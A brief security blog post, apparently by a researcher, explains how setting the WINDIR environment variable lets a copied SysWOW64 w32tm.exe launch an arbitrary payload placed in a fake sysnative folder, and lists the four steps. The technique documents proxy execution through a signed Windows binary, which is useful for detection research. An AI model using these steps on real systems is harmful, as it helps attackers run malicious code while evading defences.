I have already covered cases where I abused WINDIR environment variable to LOLBINize some WoW executables.
I thought I covered w32tm.exe before, but looking at my blog history I can’t find any reference to it.
So, here it is:
- copy c:\WINDOWS\SysWOW64\w32tm.exe .
- set windir=c:\test
- drop payload as c:\test\sysnative\w32tm.exe
- execute c:\test\w32tm.exe
